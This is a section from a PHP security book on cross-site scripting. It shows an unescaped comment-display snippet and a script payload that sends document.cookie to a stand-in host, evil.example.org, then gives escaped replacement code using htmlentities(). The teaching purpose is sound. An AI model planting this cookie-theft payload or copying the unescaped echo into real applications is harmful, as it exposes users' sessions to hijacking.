Section 2.4. Cross-Site Scripting


Cross-site scripting (XSS) is deservedly one of the best known types of attacks. It plagues web applications on all platforms, and PHP applications are certainly no exception.

Any application that displays input is at risk: web-based email applications, forums, guestbooks, and even blog aggregators. In fact, most web applications display input of some type; this is what makes them interesting, but it is also what places them at risk. If this input is not properly filtered and escaped, a cross-site scripting vulnerability exists.

Consider a web application that allows users to enter comments on each page. The following form can be used to facilitate this:

    <form action="comment.php" method="POST">
    <p>Name: <input type="text" name="name" /><br />
    Comment: <textarea name="comment" rows="10" cols="60"></textarea><br />
    <input type="submit" value="Add Comment" /></p>
    </form>

The application displays comments to other users who visit the page. For example, code similar to the following can be used to output a single comment ($comment) and corresponding name ($name):

    <?php
    /* Vulnerable: $name and $comment are echoed without any escaping */
    echo "<p>$name writes:<br />";
    echo "<blockquote>$comment</blockquote></p>";
    ?>

This approach places a significant amount of trust in the values of both $comment and $name. Imagine that one of them contained the following:

    <script>
    document.location =
      'http://evil.example.org/steal.php?cookies=' +
      document.cookie
    </script>

If this comment is sent to your users, it is no different from having allowed someone else to add this bit of JavaScript to your source. Your users will involuntarily send their cookies (the ones associated with your application) to evil.example.org, and the receiving script (steal.php) can read all of those cookies from $_GET['cookies'].

This is a common mistake, and it is perpetuated by many bad habits that have become commonplace. Luckily, the mistake is easy to avoid. Because the risk exists only when you output tainted, unescaped data, you can simply make sure that you filter input and escape output as described in Chapter 1.

At the very least, you should use htmlentities() to escape any data that you send to the client; this function converts all special characters into their HTML entity equivalents. Thus, any character that the browser interprets in a special way is converted to its HTML entity equivalent so that its original value is preserved and it is displayed as text rather than interpreted as markup.

The following replacement for the code to display a comment is a much safer approach:

    <?php
    $clean = array();
    $html = array();

    /* Filter Input ($name, $comment) into $clean['name'] and $clean['comment'] */

    /* Escape on output: ENT_QUOTES also converts single quotes, and 'UTF-8'
       tells htmlentities() the character encoding of the input */
    $html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8');
    $html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8');

    echo "<p>{$html['name']} writes:<br />";
    echo "<blockquote>{$html['comment']}</blockquote></p>";
    ?>
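The following is an added example, not code from the book: it fills in the elided filtering step with a simple stand-in (a length limit, a control-character check and a UTF-8 validity check) and feeds the section's script payload through the escaped renderer to show that it reaches the browser as inert text. The function names filter_comment_input() and render_comment() and the sample input are constructed here.

```php
<?php
declare(strict_types=1);

/* Stand-in for the Chapter 1 filter step (an assumption, not the book's rules):
 * reject missing fields, over-long values, ASCII control characters and
 * invalid UTF-8. The last check matters because htmlentities() returns an
 * empty string for invalid UTF-8 input, which silently drops the comment. */
function filter_comment_input(array $post): ?array
{
    $clean = [];
    foreach (['name' => 64, 'comment' => 2000] as $field => $max) {
        if (!isset($post[$field]) || !is_string($post[$field])) {
            return null;
        }
        $value = $post[$field];
        if ($value === '' || strlen($value) > $max
            || preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F]/', $value) === 1
            || preg_match('//u', $value) !== 1) {
            return null;
        }
        $clean[$field] = $value;
    }
    return $clean;
}

/* Escape on output. ENT_QUOTES converts both quote characters, so the same
 * escaped value is safe in element content and inside a quoted attribute. */
function render_comment(array $clean): string
{
    $html = [];
    $html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8');
    $html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8');
    return "<p>{$html['name']} writes:</p>\n"
         . "<blockquote>{$html['comment']}</blockquote>\n";
}

// Constructed sample input: the cookie-stealing payload from this section.
$sample = [
    'name'    => 'Mallory',
    'comment' => "<script>document.location='http://evil.example.org/steal.php"
               . "?cookies='+document.cookie</script>",
];

$clean = filter_comment_input($sample);
$out = ($clean === null) ? '' : render_comment($clean);
echo $out;
// The output contains &lt;script&gt; ... &lt;/script&gt;, never a raw <script> tag.
if (strpos($out, '<script') !== false) {
    throw new RuntimeException('escaping failed');
}
```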


Essential PHP Security (ISBN 059600656X), 2005, 110 pages.
